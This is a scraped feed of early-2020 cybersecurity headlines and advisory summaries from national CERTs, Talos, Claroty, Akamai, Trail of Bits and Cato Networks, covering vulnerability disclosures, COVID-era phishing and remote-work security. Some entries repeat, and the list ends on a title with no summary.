Devices’ remote access services open to the internet expose organisations to data breaches. Administrators should, at the latest now, make sure that teleworkers’ devices are secured and that firewall settings are appropriate.

https://www.kyberturvallisuuskeskus.fi/en/news/number-unsecured-remote-desktop-services-and-network-connection-services-increased
Attempted denial-of-service attacks targeted at distance learning environments on the rise
2020-04-15T11:17:22Z | 1586949442

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency has published in cooperation with the National Bureau of Investigation an announcement about attempted obstructions targeted at distance learning environments. Even if the attempts have not caused significant effects, also attempted denial-of-service attacks increase the workload of maintenance that is already under strain.

https://www.kyberturvallisuuskeskus.fi/en/news/attempted-denial-service-attacks-targeted-distance-learning-environments-rise
Attempted denial-of-service attacks targeted at distance learning environments on the rise
2020-04-15T11:17:22Z | 1586949442

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency has published in cooperation with the National Bureau of Investigation an announcement about attempted obstructions targeted at distance learning environments. Even if the attempts have not caused significant effects, also attempted denial-of-service attacks increase the workload of maintenance that is already under strain.

https://www.kyberturvallisuuskeskus.fi/en/news/attempted-denial-service-attacks-targeted-distance-learning-environments-rise
High Threat Security Alert (A20-04-03): Multiple Vulnerabilities in Microsoft Products (April 2020)
2020-04-15T04:00:00Z | 1586923200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. These security updates addressed multiple remote code execution vulnerabilities that are under active exploitation.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-04-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2020)
2020-04-15T04:00:00Z | 1586923200

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
A QUICk Introduction to HTTP/3
2020-04-14T04:00:00Z | 1586836800

HTTP/3 is the newest iteration of the HTTP protocol that improves web security and performance.

https://www.akamai.com/blog/developers/a-quick-introduction-http3
Microsoft Media Foundation CQTMetadataKeysAtom GetKeyForIndex Information Disclosure Vulnerability
2020-04-14T00:00:00Z | 1586822400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1012
The Building Wave of Internet Traffic
2020-04-13T04:00:00Z | 1586750400

The Novel Coronavirus, and the resulting viral respiratory illness caused by it, COVID-19, is changing our world. As much as possible, people around the world are practicing social distancing. This means working remotely for a large number of people, possibly...

https://www.akamai.com/blog/security/the-building-wave-of-internet-traffic
Making the switch to SD-WAN? Here’s a cheat sheet of things to consider
2020-04-12T15:06:41Z | 1586704001

The post Making the switch to SD-WAN? Here’s a cheat sheet of things to consider appeared first on Cato Networks.

https://www.catonetworks.com/resources/making-the-switch-to-sd-wan-heres-a-cheat-sheet-of-things-to-consider/
The Ultimate List of SD-WAN Benefits
2020-04-12T14:35:05Z | 1586702105

The post The Ultimate List of SD-WAN Benefits appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-ultimate-list-of-sd-wan-benefits/
CVE-2020-6992
2020-04-11T00:00:00Z | 1586563200

IMPROPER PRIVILEGE MANAGEMENT CWE-269 A local privilege escalation vulnerability has been identified in the GE Digital CIMPLICITY HMI/SCADA product. If exploited, this vulnerability could allow an adversary to modify the system, leading to the arbitrary execution of code. This vulnerability is only exploitable if an attacker has access to an authenticated session.

https://claroty.com/team82/disclosure-dashboard/cve-2020-6992
F2fs-tools fsck.f2fs sanity_check_area_boundary code execution vulnerability
2020-04-09T00:00:00Z | 1586390400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0988
RIA juhend ja videod aitavad ettevõtteil ennast küberruumis kaitsta
2020-04-08T10:40:13Z | 1586342413

Eriolukord, kus paljud inimesed töötavad kodust, suurendab ohtu, et ettevõtted ja nende töötajad satuvad küberrünnaku või -pettuse ohvriks. Riigi Infosüsteemi Amet (RIA) tegi kättesaadavaks põhjaliku materjali, kuidas oma ettevõtet ja töötajaid küberrünnete ja -pettuste eest kaitsta.

https://ria.ee/uudised/ria-juhend-ja-videod-aitavad-ettevotteil-ennast-kuberruumis-kaitsta
RIS infokiri – aprill 2020
2020-04-08T07:26:34Z | 1586330794

Riigi infosüsteemide esimeses infokirjas kirjutame muuhulgas riigivõrgust, X-teest, veebilehest id.ee ja riigiportaalist.

https://ria.ee/uudised/ris-infokiri-aprill-2020
Security Alert (A20-04-02): Multiple Vulnerabilities in Firefox
2020-04-08T04:00:00Z | 1586318400

Mozilla has published two security advisories (MFSA 2020-12, MFSA 2020-13) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Stay safe with our tips for remote work
2020-04-07T13:00:56Z | 1586264456

As a result of the current situation, the number of employees working remotely has increased, with many now working from home.  A large share of schools have also moved to distance learning. As remote work arrangements become more common, Finland’s communications networks have the necessary capacity to accommodate the increasing numbers of remote workers and online transactions. Video conference calls and emails don't, in fact, place a substantial strain on networks. To make working remotely as safe and smooth an experience as possible, we have put together this list of helpful tips.

https://www.kyberturvallisuuskeskus.fi/en/news/stay-safe-our-tips-remote-work
Stay safe with our tips for remote work
2020-04-07T13:00:56Z | 1586264456

As a result of the current situation, the number of employees working remotely has increased, with many now working from home.  A large share of schools have also moved to distance learning. As remote work arrangements become more common, Finland’s communications networks have the necessary capacity to accommodate the increasing numbers of remote workers and online transactions. Video conference calls and emails don't, in fact, place a substantial strain on networks. To make working remotely as safe and smooth an experience as possible, we have put together this list of helpful tips.

https://www.kyberturvallisuuskeskus.fi/en/news/stay-safe-our-tips-remote-work
Announcing our first virtual Empire Hacking
2020-04-07T11:00:06Z | 1586257206

At Trail of Bits, we’ve all been working remotely due to COVID-19. But the next Empire Hacking event will go on, via video conference! When: April 14th @ 6PM How: RSVP via this Google Form or on Meetup. We’ll email you an invitation early next week. Come talk shop with us! Every two months, Empire […]

https://blog.trailofbits.com/2020/04/07/announcing-our-first-virtual-empire-hacking/
Levimas on palgakonto pettused
2020-04-07T06:19:12Z | 1586240352

CERT-EE teatel on viimasel ajal aktiivselt levima hakanud palgakonto pettused, kus töötaja palub personalijuhil kanda järgmisest kuust oma palga uuele pangakontole. Tegelikult saadavad mainitud palve aga küberkurjategijad, kes ka raha endale saavad.

https://ria.ee/uudised/levimas-palgakonto-pettused
Cloud-scale Remote Access for Everyone
2020-04-06T07:30:47Z | 1586158247

The post Cloud-scale Remote Access for Everyone appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-12
High Threat Security Alert (A20-04-01): Multiple Vulnerabilities in Firefox
2020-04-06T04:00:00Z | 1586145600

Mozilla has published the security advisory (MFSA 2020-11) to address the use-after-free vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Work from Anywhere for Everyone
2020-04-05T16:19:57Z | 1586103597

The post Work from Anywhere for Everyone appeared first on Cato Networks.

https://www.catonetworks.com/resources/work-from-anywhere-for-everyone/
Allkirjade valideerimiseks tuleb uuendada DigiDoc4 klienti
2020-04-03T15:02:43Z | 1585926163

Rakenduse DigiDoc4 Klient vanemates versioonides kuvatakse osade kehtivate allkirjade staatuseks „Allkiri ei ole kehtiv“.

https://ria.ee/uudised/allkirjade-valideerimiseks-tuleb-uuendada-digidoc4-klienti
Threat Actors Recycling Phishing Kits in New Coronavirus (COVID-19) Campaigns
2020-04-03T05:19:00Z | 1585891140

Recently, researchers at Akamai observed phishing attacks leveraging recycled kits in a series of campaigns taking advantage of the Coronavirus (COVID-19) health crisis. Phishing kits that have been previously deployed over the last several months are now being used again in order to reach a new pool of potential victims: those working from home due to self-isolation, mandated quarantine, or corporate policy during the pandemic.

https://www.akamai.com/blog/security/threat-actors-recycling-phishing-kits-in-new-coronavirus--covid-
Küberkurjategijad kasutavad eriolukorda ära
2020-04-02T11:26:14Z | 1585826774

Riigi Infosüsteemi Ameti (RIA) kvartaliülevaatest selgub, et esimeses kvartalis mõjutasid Eesti küberruumi enim üleilmne eriolukord ja hüppeliselt suurenenud kaugtöövajadus. Küberkurjategijad kasutavad nii pahavara levitamiseks kui ka erinevateks õngitsusteks ja pettusteks COVID-19 viirusega seotud huvi ja hirmu.

https://ria.ee/uudised/kuberkurjategijad-kasutavad-eriolukorda-ara
CVE-2019-19102
2020-04-02T00:00:00Z | 1585785600

PATH TRAVERSAL CWE-22 A directory traversal vulnerability in SharpZipLib used in the upgrade service in B&R Automation Studio allow unauthenticated users to write to certain local directories. The vulnerability is also known as "zip slip."Read more: Claroty Researchers Uncover Vulnerabilities in Industrail Automation Software

https://claroty.com/team82/disclosure-dashboard/cve-2019-19102
CVE-2019-19101
2020-04-02T00:00:00Z | 1585785600

CWE-325: MISSING REQUIRED CRYPTOGRAPHIC STEP A missing secure communication definition and an incomplete TLS validation in the upgrade service in B&R Automation Studio enable unauthenticated users to perform MITM attacks via the B&R upgrade server.Read more: Claroty Researchers Uncover Vulnerabilities in Industrail Automation Software

https://claroty.com/team82/disclosure-dashboard/cve-2019-19101
CVE-2019-19100
2020-04-02T00:00:00Z | 1585785600

IMPROPER PRIVILEGE MANAGEMENT CWE-269 A privilege escalation vulnerability in the upgrade service in B&R Automation Studio could allow authenticated users to delete arbitrary files via an exposed interface.Read more: Claroty Researchers Uncover Vulnerabilities in Industrail Automation Software

https://claroty.com/team82/disclosure-dashboard/cve-2019-19100-cve-2019-19101-cve-2019-19102
The Vollgar Campaign: MS-SQL Servers Under Attack
2020-04-01T14:56:00Z | 1585752960

Guardicore Labs uncovers an attack campaign that?s been under the radar for almost two years, breaching MS-SQL servers and infecting them with remote-access tools and cryptominers.

https://www.akamai.com/blog/security/vollgar-ms-sql-servers-under-attack
RIA avas testkasutuseks turvalised veebisuhtluse ja failivahetuse keskkonnad
2020-04-01T11:17:13Z | 1585739833

Riigi Infosüsteemi Amet avas testkasutuseks suhtluskeskkonna (vestlus.eesti.ee) ja failivahetuskeskkonna (sahver.eesti.ee). Mainitud lahendusi saavad turvaliselt kasutada inimesed, kellel on Eesti isikukood ja mõni tunnustatud eID vahenditest.

https://ria.ee/uudised/ria-avas-testkasutuseks-turvalised-veebisuhtluse-ja-failivahetuse-keskkonnad
An Echidna for all Seasons
2020-03-30T11:00:46Z | 1585566046

TL;DR: We have improved Echidna with tons of new features and enhancements since it was released—and there’s more to come. Two years ago, we open-sourced Echidna, our property-based smart contract fuzzer. Echidna is one of the tools we use most in smart contract assessments. According to our records, Echidna was used in about 35% of […]

https://blog.trailofbits.com/2020/03/30/an-echidna-for-all-seasons/
SASE and WAN Transformation – A Strategic Duo
2020-03-29T20:59:58Z | 1585515598

Modern enterprises are going through challenging times. Increasing price competition, customer expectations for a seamless buying experience, instant delivery – altogether require a business that operates at optimal reliability and efficiency. At the same time, the business must be very agile to quickly adapt to market dynamics. Those business requirements are dependent on having a... The post SASE and WAN Transformation – A Strategic Duo appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-and-wan-transformation-a-strategic-duo/
High Threat Security Alert (A20-03-09): Multiple Vulnerabilities in Red Hat JBoss
2020-03-27T04:00:00Z | 1585281600

Red Hat has released new versions of JBoss Enterprise Application Platform to address multiple vulnerabilities in the Apache JServ Protocol (AJP), Apache Thrift and OpenSSL security provider.

https://www.govcert.gov.hk/en/alerts_detail.php
MPLS, SD-WAN, and SASE
2020-03-26T15:51:40Z | 1585237900

The post MPLS, SD-WAN, and SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/mpls-sase-or-sd-wan-which-architecture-is-right-for-your-digital-transformation
SonicWall SMA1000 HTTP Extraweb server Denial of Service vulnerability
2020-03-25T20:00:00Z | 1585166400

A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier. CVE: CVE-2020-5129 Last updated: March 25, 2020, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0002
Security Alert (A20-03-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-03-25T04:00:00Z | 1585108800

Apple has released iOS 13.4 and iPadOS 13.4 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
3S-Smart Software Solutions CODESYS GatewayService memory corruption vulnerability
2020-03-25T00:00:00Z | 1585094400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0897
NVIDIA D3D10 Driver nvwgf2umx_cfg.dll nvwg FTOI code execution vulnerability
2020-03-25T00:00:00Z | 1585094400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1039
CVE-2020-10939
2020-03-25T00:00:00Z | 1585094400

Unprivileged user can override the main service of 'PC WORX SRT' under the Phoenix Contact installation path, and therefore, escalate to run code as SYSTEM user and gain local privilege escalation. A malicious user can leverage this knowledge and override the main 'PC WORX SRT' service with a rogue binary which will result with running malicious code as SYSTEM user.

https://claroty.com/team82/disclosure-dashboard/cve-2020-10939
Protect Your Systems Now from the Critical Windows SMBv3 RCE Vulnerability
2020-03-24T19:39:27Z | 1585078767

At the beginning of the month, Microsoft released an advisory and security patch for a serious Windows Server Message Block (SMB) vulnerability called the Windows SMBv3 Client/Server Remote Code Execution Vulnerability (AKA Windows SMBv3 RCE or CVE-2020-0796). The Server Message Block (SMB) protocol is essential for Windows network file and print sharing. Left unpatched, this... The post Protect Your Systems Now from the Critical Windows SMBv3 RCE Vulnerability appeared first on Cato Networks.

https://www.catonetworks.com/blog/protect-your-systems-now-from-the-critical-windows-smbv3-rce-vulnerability/
Security Alert (A20-03-07): Multiple Vulnerabilities in Microsoft Windows
2020-03-24T04:00:00Z | 1585022400

Multiple vulnerabilities have been found in the Microsoft Windows Adobe Type Manager library.

https://www.govcert.gov.hk/en/alerts_detail.php
Working Together to Manage Global Internet Traffic Increases
2020-03-24T04:00:00Z | 1585022400

As businesses and consumers around the world adjust their routines amid the various COVID-19 restrictions, the internet is being used at a scale that the world has never experienced. In addition to millions of people who are now working from...

https://www.akamai.com/blog/news/working-together-to-manage-global-internet-traffic-increases
Intel Raid Web Console 3 DISCOVERY Denial of Service
2020-03-24T00:00:00Z | 1585008000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0914
Intel Raid Web Console 3 add server denial-of-service vulnerability
2020-03-24T00:00:00Z | 1585008000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0894
Announcing the Zeek Agent
2020-03-23T11:00:25Z | 1584961225

(This posting is cross-posted between the Zeek blog and the Trail of Bits blog). The Zeek Network Security Monitor provides a powerful open-source platform for network traffic analysis. However, from its network vantage point, Zeek lacks access to host-level semantics, such as the process and user accounts that are responsible for any connections observed. The […]

https://blog.trailofbits.com/2020/03/23/announcing-the-zeek-agent/
Videolabs libmicrodns 0.1.0 mdns_recv return value denial-of-service vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1001
Videolabs libmicrodns 0.1.0 message-parsing bounds denial-of-service vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1000
Videolabs libmicrodns 0.1.0 TXT record RDATA-parsing denial-of-service vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0996
GStreamer gst-rtsp-server GstRTSPAuth Denial of Service Vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1018
Videolabs libmicrodns 0.1.0 resource allocation denial-of-service vulnerabilities
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1002
Videolabs libmicrodns 0.1.0 resource record recursive label uncompression denial-of-service vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0994
Videolabs libmicrodns 0.1.0 rr_decode return value remote code execution vulnerability
2020-03-23T00:00:00Z | 1584921600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0995
There are Corona scams about - be careful what you click on
2020-03-20T13:30:16Z | 1584711016

Scammers and distributors of malware often take advantage of current, emotional topics to scam people. Now the topic is coronavirus, which has been harnessed as part of the toolkit for scammers and criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/there-are-corona-scams-about-be-careful-what-you-click
There are Corona scams about - be careful what you click on
2020-03-20T13:30:16Z | 1584711016

Scammers and distributors of malware often take advantage of current, emotional topics to scam people. Now the topic is coronavirus, which has been harnessed as part of the toolkit for scammers and criminals.

https://www.kyberturvallisuuskeskus.fi/en/news/there-are-corona-scams-about-be-careful-what-you-click
Levimas on ingliskeelsed petukõned
2020-03-20T07:48:13Z | 1584690493

CERT-EE on saanud teateid ingliskeelsetest telefonikõnedest, kus uuritakse inimese arvuti turvalisuse kohta ja soovitakse sellele ligipääsu. Katkestage sellised kõned otsekohe!

https://ria.ee/uudised/levimas-ingliskeelsed-petukoned
An Accelerator Program for Early Stage Innovations in Water
2020-03-20T04:00:00Z | 1584676800

Continuing in our commitment to sustainability, Akamai is excited to announce the launch of our accelerator program supporting innovators and building solutions to address India's water challenges.

https://www.akamai.com/blog/culture/an-accelerator-program-for-early-stage-innovations-in-water
Security Alert (A20-03-06): Vulnerability in Drupal
2020-03-19T04:00:00Z | 1584590400

Drupal has released a security update to fix the vulnerability in the third-party CKEditor library.

https://www.govcert.gov.hk/en/alerts_detail.php
Financial Cryptography 2020 Recap
2020-03-18T11:50:32Z | 1584532232

A few weeks ago, we went to the 24th Financial Cryptography (FC) conference and the Workshop on Trusted Smart Contracts (WTSC), where we presented our work on smart contract bug categorization (see our executive summary) and a poster on Echidna. Although FC is not a blockchain conference, it featured several blockchain-oriented presentations this year and […]

https://blog.trailofbits.com/2020/03/18/financial-cryptography-2020-recap/
Security Alert (A20-03-05): Multiple Vulnerabilities in Adobe Reader/Acrobat
2020-03-18T04:00:00Z | 1584504000

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
How To Protect Your Systems Against Critical SMB Vulnerabilities (CVE-2020-0796)
2020-03-17T20:12:00Z | 1584475920

Discover how to protect your systems against SMB vulnerabilities and the latest critical Microsoft vulnerabilities released.

https://www.akamai.com/blog/security/how-to-protect-your-systems-against-critical-smb-vulnerabilities-cve-2020-0796
Küberkurjategijad ei maga
2020-03-17T08:17:22Z | 1584433042

CERT-EE on saanud teateid petukirjadest, mis pakuvad näiliselt kodutöövõimalusi või infot koroonaviiruse kohta. Soovitame selliste kirjade suhtes ettevaatlik olla.

https://ria.ee/uudised/kuberkurjategijad-ei-maga
Security Alert (A20-03-04): Multiple Vulnerabilities in VMware Products
2020-03-17T04:00:00Z | 1584417600

VMware has published a security advisory to address use-after-free vulnerability in vmnetdhcp, improper file permissions in Cortado Thinprint, and improper protection for the configuration files of the VMware USB arbitration service.

https://www.govcert.gov.hk/en/alerts_detail.php
Change the Rules Speaker Event
2020-03-17T04:00:00Z | 1584417600

Akamai's Women's Forum Americas, OHANA and In Reach Employee Resource Groups recently hosted Cross ERG 'Change the Rules' Keynote - Celebration of Black History Month in our Chicago office. We were excited to have notable Michelle Silverthorn, CEO of Inclusion Nation, a company that focuses on improving recruitment, retention, and the promotion of diverse professionals, as the keynote speaker. It is not often that we have an external speaker join us and have the impact Michelle had with her talk on Changing the Rules. Her stories resonated with the audience and her actionable approach was most appreciated.

https://www.akamai.com/blog/culture/change-the-rules-speaker-event
Real-time file monitoring on Windows with osquery
2020-03-16T11:12:42Z | 1584357162

TL;DR: Trail of Bits has developed ntfs_journal_events, a new event-based osquery table for Windows that enables real-time file change monitoring. You can use this table today to performantly monitor changes to specific files, directories, and entire patterns on your Windows endpoints. Read the schema documentation here! File monitoring for fleet security and management purposes File […]

https://blog.trailofbits.com/2020/03/16/real-time-file-monitoring-on-windows-with-osquery/
Alternatives to VPN for Remote Access
2020-03-15T22:24:02Z | 1584311042

Work from anywhere has recently become a hot topic. The corona virus outbreak has forced many organizations to move some or all of their employees to work from home. In some cases, work from home was a way to reduce possible exposure, in others it was mandated by health authorities to prevent the spread of... The post Alternatives to VPN for Remote Access appeared first on Cato Networks.

https://www.catonetworks.com/blog/work-from-anywhere-for-everyone-a-modern-vpn-alternative-to-deploy-now/
Our Full Report on the Voatz Mobile Voting Platform
2020-03-13T11:52:37Z | 1584100357

Voatz allows voters to cast their ballots from any geographic location on supported mobile devices. Its mobile voting platform is under increasing public scrutiny for security vulnerabilities that could potentially invalidate an election. The issues are serious enough to attract inquiries from the Department of Homeland Security and Congress. However, there has been no comprehensive […]

https://blog.trailofbits.com/2020/03/13/our-full-report-on-the-voatz-mobile-voting-platform/
FIRST releases updated Computer Security Incident Response Team (CSIRT) Services Framework – Version 2.1
2020-03-12T00:00:00Z | 1583971200

https://www.first.org/newsroom/releases/20200312
Cloud-scale Secure Remote Access Demo
2020-03-11T13:39:12Z | 1583933952

The post Cloud-scale Secure Remote Access Demo  appeared first on Cato Networks.

https://www.catonetworks.com/resources/connect-mobile-users-to-multi-cloud-datacenters/
Levib pahavara sisaldav ja Terviseametit matkiv libakiri
2020-03-11T07:45:35Z | 1583912735

RIA küberintsidentide käsitlemise osakonnale (CERT-EE-le) anti eile õhtul teada, et inimestele saadetakse Terviseameti ametlikku infot kopeeriv libakiri, milles on link pahavarale.

https://ria.ee/uudised/levib-pahavara-sisaldav-ja-terviseametit-matkiv-libakiri
High Threat Security Alert (A20-03-02): Multiple Vulnerabilities in Microsoft Products (March 2020)
2020-03-11T04:00:00Z | 1583899200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that active exploitation against the vulnerability in Microsoft Exchange Server for remote code execution have been observed. Microsoft also identified a new vulnerability in its Server Message Block 3.1.1 (SMBv3) protocol.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-03-03): Multiple Vulnerabilities in Firefox
2020-03-11T04:00:00Z | 1583899200

Mozilla has published two security advisories to address multiple browser vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Phishing Victims From a CDN's Point of View
2020-03-10T04:00:00Z | 1583812800

Overview Being a Content Delivery Network (CDN) platform, sometimes you can see fractions of attacks on the wire. In this blog, we will focus on phishing websites that, while not being delivered by the Akamai platform, are referring to or...

https://www.akamai.com/blog/security/phishing-victims-from-a-cdns-point-of-view
Microsoft Windows 10 Kernel SetMapMode MM_HIENGLISH information disclosure vulnerability
2020-03-10T00:00:00Z | 1583798400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1016
WAGO PFC200 Cloud Connectivity TimeoutUnconfirmed Command Injection Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0950
WAGO PFC200 iocheckd service "I/O-Check" cache Multiple Memory Corruption Vulnerabilities
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0966
WAGO PFC200 Cloud Connectivity TimeoutPrepared Command Injection Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0949
WAGO e!COCKPIT file path improper input validation vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0952
WAGO PFC200 Cloud Connectivity Multiple Command Injection Vulnerabilities
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0948
WAGO PFC100/200 Web-Based Management (WBM) Authentication Regex Information Disclosure Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0923
WAGO e!Cockpit network communication cleartext transmission vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0899
WAGO PFC200 iocheckd service "I/O-Check" cache Multiple Code Execution Vulnerabilities
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0963
WAGO PFC200 iocheckd service "I/O-Check" cache gateway Memory Corruption Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0965
WAGO PFC200 Cloud Connectivity Remote Code Execution Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0954
WAGO PFC200 iocheckd service "I/O-Check" cache Multiple Command Injection Vulnerabilities
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0962
WAGO PFC100/200 Web-Based Management (WBM) Authentication Timing Information Disclosure Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0924
WAGO PFC100/200 Web-Based Management (WBM) FastCGI configuration insufficient resource pool denial of service
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0939
WAGO PFC200 Cloud Connectivity Improper Host Validation Vulnerability
2020-03-09T00:00:00Z | 1583712000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0953
The 4 Key Considerations for Extending Your Business Continuity Plan (BCP) to Home and Remote Workers
2020-03-08T13:01:30Z | 1583672490

It’s a challenge not to think of a spreading health crisis when you’re crushed into a crowded train or bus, clutching a germ-infested pole and dodging a nearby cough. As the current crisis develops, enterprise business continuity planning and risk management will lead to millions of enterprise users working full time from home. Already we’ve... The post The 4 Key Considerations for Extending Your Business Continuity Plan (BCP) to Home and Remote Workers appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-4-key-considerations-for-extending-your-business-continuity-plan-bcp-to-home-and-remote-workers/
Security Alert (A20-03-01): Vulnerability in Point-to-Point Protocol Daemon (pppd)
2020-03-06T04:00:00Z | 1583467200

A vulnerability was found in Extensible Authentication Protocol (EAP) packet processing in eap_request and eap_response of the pppd (Point-to-Point Protocol Daemon).

https://www.govcert.gov.hk/en/alerts_detail.php
From MPLS to SD-WAN to SASE: An Evolution of Enterprise Networking
2020-03-05T12:34:19Z | 1583411659

The way we do business is changing. As critical business applications migrate to the cloud, and the mobile workforce continues to grow, networking and security solutions need to evolve in order to meet the changing business needs. Gartner believes (and we agree) that the future of networking lies with SASE (Secure Access Service Edge) –... The post From MPLS to SD-WAN to SASE: An Evolution of Enterprise Networking appeared first on Cato Networks.

https://www.catonetworks.com/blog/from-vpn-internet-access-to-sd-wan-an-evolution-of-enterprise-networking/
Zoom conference room connector service insufficient session invalidation
2020-03-05T00:00:00Z | 1583366400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0969
Manticore discovers the ENS bug
2020-03-03T19:21:52Z | 1583263312

The Ethereum Name Service (ENS) contract recently suffered from a critical bug that prompted a security advisory and a migration to a new contract (CVE-2020-5232). ENS allows users to associate online resources with human-readable names. As you might expect, it allows you to transfer and sell domain names. Specific details about the bug were in […]

https://blog.trailofbits.com/2020/03/03/manticore-discovers-the-ens-bug/
2019: A Year of Innovation and Validation for the Cato Vision
2020-03-03T10:57:11Z | 1583233031

Today we announced our 2019 business results, and those results were nothing short of stellar. We saw massive growth in our customer base, explosion of channel interest and…. planetary alignment. Yes, the stars shifted in 2019, as the industry adoption of Cato’s revolutionary approach to networking and security came in the form of Gartner’s Secure... The post 2019: A Year of Innovation and Validation for the Cato Vision appeared first on Cato Networks.

https://www.catonetworks.com/blog/2019-a-year-of-innovation-and-validation-for-the-cato-vision/
Webkit AudioSourceProviderGStreamer use-after-free vulnerability
2020-03-03T00:00:00Z | 1583193600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1172
Epignosis eFront LMS Password Reset authentication bypass vulnerability
2020-03-03T00:00:00Z | 1583193600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1221
Growing, Exploring and My First Conference
2020-03-02T05:00:00Z | 1583125200

By now, we are all subject in one way or another to the far-reaching impact of COVID-19. As we see on the news each day, the numbers of those infected by this deadly coronavirus continue to grow in terrifying increments. And even for those of us without family members or friends directly impacted by the virus, life has profoundly changed.

https://www.akamai.com/blog/culture/bridget-meuse-growing-exploring-and-my-first-conference
Kr00k WiFi Vulnerability
2020-02-27T22:00:00Z | 1582840800

An issue was discovered on Broadcom Wi-Fi client devices. Specifically timed and handcrafted traffic can cause internal errors (related to state transitions) in a WLAN device that lead to improper layer 2 Wi-Fi encryption with a consequent possibility of information disclosure over the air for a discrete set of traffic, a different vulnerability than CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, and CVE-2019-9503. CVE: CVE-2019-15126 Last updated: Feb. 27, 2020, 10 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0001
Guardicore at RSA: AI-Powered Segmentation, Cloud Native Security
2020-02-27T20:38:00Z | 1582835880

This week we?re announcing two new capabilities in our Centra Security Platform that further deliver on that mission: Support for cloud-native resources and AI-powered segmentation.

https://www.akamai.com/blog/security/ai-powered-segmentation-cloud-native-security
High Threat Security Alert (A20-02-07): Multiple Vulnerabilities in Google Chrome
2020-02-27T04:00:00Z | 1582776000

Google released a security update to address multiple vulnerabilities in ICU, streams and V8 of the Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-02-08): Vulnerability in Broadcom and Cypress Wireless Chipset
2020-02-27T04:00:00Z | 1582776000

ESET has published a security report revealing technical details about a vulnerability in FullMAC wireless chipset manufactured by Broadcom and Cypress.

https://www.govcert.gov.hk/en/alerts_detail.php
Inside Cato Networks Advanced Security Services
2020-02-26T16:07:00Z | 1582733220

The post Inside Cato Networks Advanced Security Services appeared first on Cato Networks.

https://www.catonetworks.com/resources/inside-cato-networks-advanced-security-services/
Where is Network Security headed in 2020?
2020-02-26T13:53:07Z | 1582725187

